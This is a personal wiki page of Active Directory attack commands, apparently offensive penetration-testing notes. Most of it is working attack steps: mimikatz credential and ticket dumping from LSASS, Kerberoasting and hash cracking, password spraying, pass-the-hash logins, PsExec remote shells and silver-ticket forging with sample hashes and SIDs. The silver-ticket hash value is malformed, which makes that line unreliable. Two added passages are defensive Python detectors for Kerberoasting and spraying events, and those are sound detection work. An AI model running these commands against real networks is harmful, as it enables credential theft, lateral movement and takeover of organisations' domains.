Particle42
All Commands, Tools & Scripts


Last updated 6 months ago


Here is a collection of commands, tools and scripts that you can use during the exploitation of an Active Directory environment.

There are 2 popular versions of the mimikatz tool that work with different versions of Windows: Mimikatz 2.1.1 and 2.2.0. I am yet to figure out the compatible versions, and once I have them figured out I will list them here. Until then, if you get an error while trying to list passwords and tickets, switch versions and try again.

List of users & groups within the local system

net user
net group

List of shares in the local and remote machine

NET SHARE

NET VIEW \\ComputerName /All

List of users and groups within the domain

In order to be able to list the users and groups from the domain, you should be logged in as a user of that domain.

net user /domain
net group /domain
Details about a user (password profile, groups, etc.)

net user alice /domain

List of users and their attributes

A script to list all domain users together with their attributes: https://github.com/SisyphusP42/vapt/blob/main/Windows_Users%26Attributes

List of Logged in users

Import-Module .\PowerView.ps1
Get-NetLoggedon -ComputerName p42176   # locally logged-in users
Get-NetSession -ComputerName p42       # domain logged-in users

Alternatively, the PsLoggedon executable can be used to retrieve the list when PowerView does not work due to permissions,

.\PsLoggedon.exe \\systemname

List of SPNs in the domain

Service Principal Names are names given to services hosted within the domain. Enumerating them gives us the IP address and port of those services along with a list of other details.

In the users & attributes script, change the filter $Search.filter="samAccountType=805306368" to $Search.filter="serviceprincipalname=*http*" so that it returns SPNs instead of user accounts.

Get-SPN -type service -search "*http*"

The native Windows tool setspn can also be used to get the list of SPNs,

setspn -L iis_service

Retrieve User Password Hash from LSASS

We will use the mimikatz executable to retrieve the password hashes; you need at least local administrator privilege to get them,

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

List local users and NTLM Hash

This command can be used to list the local users along with their NTLM hashes. It is all the more useful once you gain access to a domain controller, where it lists all users belonging to that domain.

mimikatz.exe
privilege::debug
lsadump::lsa /patch

Retrieve TGT and TGS of Users & Services

The TGT and TGS of logged-in users are stored in LSASS.

mimikatz.exe
privilege::debug
sekurlsa::tickets

Export TGS to the drive & Crack it

We can export the TGS to the drive and then use John or Hashcat to crack the file. The mimikatz procedure is as follows; you will need to know the SPN to retrieve its ticket.

#Powershell Commands
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/p42http.p42.com'

#Mimikatz tool
mimikatz.exe
privilege::debug
kerberos::list /export

# Crack the exported .kirbi file with tgsrepcrack
python /usr/share/kerberoast/tgsrepcrack.py rockyou.txt HTTP~p42http.p42.com-CORP.COM.kirbi

Invoke-Kerberoast

Invoke-Kerberoast -OutputFormat hashcat | fl

Once you have the output in hashcat format (saved to a file, e.g. hashes.txt), it can be cracked using hashcat. Mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4); the hash file comes first, then the wordlist, and -o writes the recovered passwords to a file,

hashcat -m 13100 -a 0 hashes.txt /usr/share/seclists/Passwords/Common-Credentials/file.txt -o cracked.txt
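A defender-side check for the activity described in this section: Kerberoasting shows up on the domain controller as Security Event 4769 (service ticket requested) with RC4 encryption (etype 0x17) for user-account SPNs, often many of them from one requester in a short time. This is an added example, not part of the original notes; the records are constructed and the field names follow the 4769 event schema.

```python
from collections import defaultdict

# Constructed sample Security log records for Event ID 4769
# ("A Kerberos service ticket was requested"). Values are made up.
SAMPLE_4769 = [
    {"TargetUserName": "alice@P42.COM", "ServiceName": "iis_service",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.5"},
    {"TargetUserName": "alice@P42.COM", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.5"},
    {"TargetUserName": "alice@P42.COM", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.5"},
    {"TargetUserName": "bob@P42.COM", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.9"},
    {"TargetUserName": "carol@P42.COM", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.7"},
    {"TargetUserName": "dave@P42.COM", "ServiceName": "iis_service",
     "TicketEncryptionType": "0x17", "Status": "0x6", "IpAddress": "10.0.0.8"},
]

RC4_HMAC = 0x17  # etype 23: the TGS is encrypted with the service account's NTLM key


def is_roastable_request(ev):
    """True when a 4769 looks like a Kerberoast-style request: RC4 ticket,
    successful, and for a user account (machine accounts and krbtgt excluded)."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    if int(ev["Status"], 16) != 0:          # non-zero status means the request failed
        return False
    return int(ev["TicketEncryptionType"], 16) == RC4_HMAC


def find_kerberoast_candidates(events, min_services=2):
    """Group roastable requests by requester and return those that pulled
    RC4 tickets for at least `min_services` distinct service accounts."""
    seen = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            seen[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in seen.items()
            if len(svcs) >= min_services}


if __name__ == "__main__":
    for user, svcs in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"{user} requested RC4 service tickets for: {', '.join(svcs)}")
```

Moving service accounts to AES-only (msDS-SupportedEncryptionTypes) makes RC4 requests for them stand out even more, and a single requester hitting every SPN at once is the pattern worth alerting on.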

Slow User Password Guessing

One way, though not the most effective, is to attempt logins with guessed passwords. We can automate this with PowerShell scripts. One thing to keep in mind is the number of wrong passwords after which an account is locked. We can find it with,

net accounts

Lockout Threshold and Lockout Observation Window are the 2 parameters to keep in mind before starting this attack.

Import-Module DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Spring2017
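The detection counterpart to the spray above, added here and not part of the original notes: a spray stays under the lockout threshold per account but fails against many accounts from one source, so grouping Event 4625 (failed logon) records by source address and counting distinct target users inside a short window separates it from one user mistyping a password. The records are constructed; field names follow the 4625 schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security log records for Event ID 4625
# ("An account failed to log on"). Times and addresses are made up.
SAMPLE_4625 = [
    {"TimeCreated": "2024-01-08T09:00:00", "TargetUserName": "alice", "IpAddress": "10.0.0.5"},
    {"TimeCreated": "2024-01-08T09:00:05", "TargetUserName": "bob",   "IpAddress": "10.0.0.5"},
    {"TimeCreated": "2024-01-08T09:00:10", "TargetUserName": "carol", "IpAddress": "10.0.0.5"},
    {"TimeCreated": "2024-01-08T09:00:15", "TargetUserName": "dave",  "IpAddress": "10.0.0.5"},
    # one user mistyping a password: several failures, but a single account
    {"TimeCreated": "2024-01-08T09:01:00", "TargetUserName": "bob",   "IpAddress": "10.0.0.9"},
    {"TimeCreated": "2024-01-08T09:01:30", "TargetUserName": "bob",   "IpAddress": "10.0.0.9"},
    {"TimeCreated": "2024-01-08T09:02:00", "TargetUserName": "bob",   "IpAddress": "10.0.0.9"},
    # two failures from one host half an hour apart: outside a 10-minute window
    {"TimeCreated": "2024-01-08T09:00:00", "TargetUserName": "eve",   "IpAddress": "10.0.0.7"},
    {"TimeCreated": "2024-01-08T09:30:00", "TargetUserName": "frank", "IpAddress": "10.0.0.7"},
]


def find_spray_sources(events, window_minutes=10, min_users=3):
    """Return {source_ip: sorted distinct usernames} for every source that fails
    logons against at least `min_users` different accounts within any sliding
    window of `window_minutes`. Per-account attempt counts are deliberately
    ignored: a spray keeps those below the lockout threshold."""
    by_src = defaultdict(list)
    for ev in events:
        when = datetime.fromisoformat(ev["TimeCreated"])
        by_src[ev["IpAddress"]].append((when, ev["TargetUserName"].lower()))
    window = timedelta(minutes=window_minutes)
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {user for when, user in attempts[i:] if when - start <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits


if __name__ == "__main__":
    for src, users in find_spray_sources(SAMPLE_4625).items():
        print(f"possible password spray from {src}: {', '.join(users)}")
```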

Windows Login with NTLM Hash

This works only with the NTLM hash of AD admin accounts and built-in local admin accounts; it is simply a replacement for logging in with a password.

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.1.1 cmd

Use user NTLM Hash to open application

This works when another user has logged on to the system using NTLM and you would like to start an application in that user's context. Here we obtain a ticket for PowerShell and open the PowerShell application.

Ensure that a user already has a session using NTLM, and get the password hash as shown under the section "Retrieve User Password Hash from LSASS".

Then use the following commands to get a Kerberos ticket for PowerShell,

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:p42.com /ntlm:e2b475c31da2a5738190f67ae965c227 /run:PowerShell.exe

With this you should have a powershell open within the context of the user "administrator".

Generate TGT & TGS using Powershell Opened within User's Context

If you already have a PowerShell application open within the user's context, then you can request a TGT and use it to further your attack. The following command authenticates to a network share,

net use \\p42

Note: Any command that requires authentication against the DC can be used here.

You can check the generated ticket using the command "klist".

Open a Cmd Prompt on a Remote System

.\PsExec.exe \\p42 -c cmd.exe -u <domainname\username> -p <password>

It is important to note that some systems accept only the host name, which then has to be used in the command instead of the IP address or loopback address.

Open a Cmd Prompt from the Linux System

This is the Linux equivalent of PsExec on Windows. It comes in handy when you have a username and password and want command-prompt control of a remote system. It requires SMB on the target and write access to the ADMIN$ share.

psexec.py p42/user123:hereisapassword@192.168.1.1

As with PsExec, some systems accept only the host name, which then has to be used in the command instead of the IP address or loopback address.

Crafting a Silver Ticket in Kerberos

A silver ticket is a service ticket (TGS) forged by the attacker rather than obtained from the KDC with a TGT. We will need the password hash of the service account that runs the service and the Security Identifier (SID) of the user's domain.

The SID can be viewed using the following command; the domain SID is the user's SID without its final component (the RID),

whoami /user

Then the ticket can be crafted using mimikatz,

mimikatz.exe
kerberos::purge
kerberos::list
kerberos::golden /user:user1 /domain:p42.com /sid:S-1-5-21-1602849587-2789273131-2649389668 /target:httpserver.p42.com /service:HTTP /rc4:E2B4748C11DA2A07DH92749W87A992C917 /ptt

The rc4 parameter indicates the encryption algorithm to be used, and its value is the key for that encryption, which here is the NTLM hash of the service account. The NTLM hash can be obtained for the SPN by requesting a service ticket and then cracking it; see the "Export TGS to the drive & Crack it" section.

Referenced Scripts & Links

Windows users & attributes script: https://github.com/SisyphusP42/vapt/blob/main/Windows_Users%26Attributes
PowerView: script from GitHub to list logged-in users.
Get-SPN: the same script used for enumerating users and attributes can be used for SPNs with a slight modification; alternatively the Get-SPN script can be used.
tgsrepcrack: once the ticket is exported, it can be cracked using tgsrepcrack.
Invoke-Kerberoast: a PowerShell script that takes care of identifying SPNs and exporting the kirbi files end-to-end.
DomainPasswordSpray: the script used to try and guess user passwords.
PsExec.exe: to open a command prompt on a remote system within the context of a user, you should already have a PowerShell/cmd prompt in that user's context on the local system; then the tool can be used to open the remote prompt.